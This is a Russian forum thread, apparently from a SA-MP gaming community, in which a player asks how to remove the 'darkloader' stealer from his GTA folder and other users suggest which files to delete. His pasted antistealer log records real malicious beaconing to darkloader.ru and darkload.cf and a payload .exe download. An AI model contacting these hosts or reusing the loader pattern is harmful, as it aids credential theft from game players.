Как убрать стиллер от Данилы Горцунева (darkloader/darkstealer)?

[.night7]

Версия SA-MP

1. 0.3.7 (R1)
2. 0.3.7-R2
3. 0.3.7-R3
4. 0.3.7-R4
5. 0.3DL

Есть логи антистиллера ДаркПиксель, за что большое ему спасибо, я бы тогда не узнал, и сейчас у меня вопрос, 1. Как убрать стиллер? 2. Как я могу найти самого владельца если знаю только его никнейм на darkloader'е
((
Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov
))
А ещё я смог скачать один из .exe файлов стиллера. Ну знаю как его скачать ( по какой ссылке )

Спойлер: Логи

|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|
|> | AntiStealer | V5.2.5 | By DarkP1xel | .LOG File | <|
|> Official Web-Site: https://blast.hk/ <|
|> Subscribe to my YouTube Channel: https://vk.cc/5PCsTe <|
|> Official Topic: https://blast.hk/threads/16018/ <|
|> DONATE: https://qiwi.me/antistealer/ <|
|> KEEP CALM AND SMOKE SOME WEED <|
|> !AntiStealer LOADED! <|
|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|

[PATCHED] > [Process32FirstW] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\RunDLL32Fix.asi]
[PATCHED] > [Process32NextW] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\RunDLL32Fix.asi]
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [RtlInitUnicodeStringEx] > [C:\WINDOWS\SYSTEM32\ntdll.dll] > {SourceString: !0AntiStealerByDarkP1xel.ASI}
[WARNING] > [gethostbyname] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {name: darkloader.ru}
[WARNING] > [send] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {buf: GET /path.php?id=0060 HTTP/1.1

Host: darkloader.ru

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[WARNING] > [gethostbyname] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {name: darkloader.ru}
[WARNING] > [send] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {buf: GET /link.php?id=0060&pc_hash=136408432 HTTP/1.1

Host: darkloader.ru

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[WARNING] > [gethostbyname] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {name: darkload.cf}
[WARNING] > [send] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {buf: GET /files/%EF%BB%BF60_1.exe HTTP/1.1

Host: darkload.cf

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[PATCHED] > [ZwWriteVirtualMemory] > [C:\WINDOWS\System32\KERNELBASE.dll] > {hProcess: BAD PROCESS}

UPDATED: Короче, я нашёл тот зловред, это был Memory2048.cs, все файлы остальные безопасны, спасибо всем кто помог!

 

[Yarikzzzz]

cноси гта, а есле тебе предатор загрузился пресс ф

 

[qWerTy.reg]

Формат какой был? lua?

 

[.night7]

Формат какой был? lua?

вопрос к чему?

cноси гта, а есле тебе предатор загрузился пресс ф

сносить? я только её поставил

 

[Yarikzzzz]

вопрос к чему?

сносить? я только её поставил

включи скрытые папки и удали : RunDLL32Fix.asi , samp.vxd и еще можешь поискать

 

[qWerTy.reg]

вопрос к чему?

сносить? я только её поставил

просто формат какой лоадера был?

 

[.night7]

просто формат какой лоадера был?

как понимаю vxd

включи скрытые папки и удали : RunDLL32Fix.asi , samp.vxd и еще можешь поискать

удалил, ничего не изменилось

 

[qWerTy.reg]

Посмотреть вложение 58977

нету такого

ты чо палишь

 

[.night7]

Посмотреть вложение 58977

нету такого

был handler.asi

 

[qWerTy.reg]

Посмотреть вложение 58977

нету такого

 

[Yarikzzzz]

был handler.asi

Этот файл загружаеться как запасной, типа когда удалишь 1 файл будет 2 .
нихуя ты багатый

Посмотреть вложение 58978

 

[.night7]

Этот файл загружаеться как запасной, типа когда удалишь 1 файл будет 2 .
нихуя ты багатый

у меня по 2 файла появляется, откуда хз

 

[Yarikzzzz]

у меня по 2 файла появляется, откуда хз

Кинь скрин : cleo, sampfuncs, data, moonloader. корень.

 

[.night7]

Кинь скрин : cleo, sampfuncs, data, moonloader. корень.

Кинь скрин : cleo, sampfuncs, data, moonloader. корень.

 

[Yarikzzzz]

tpm.v3.luac где качал?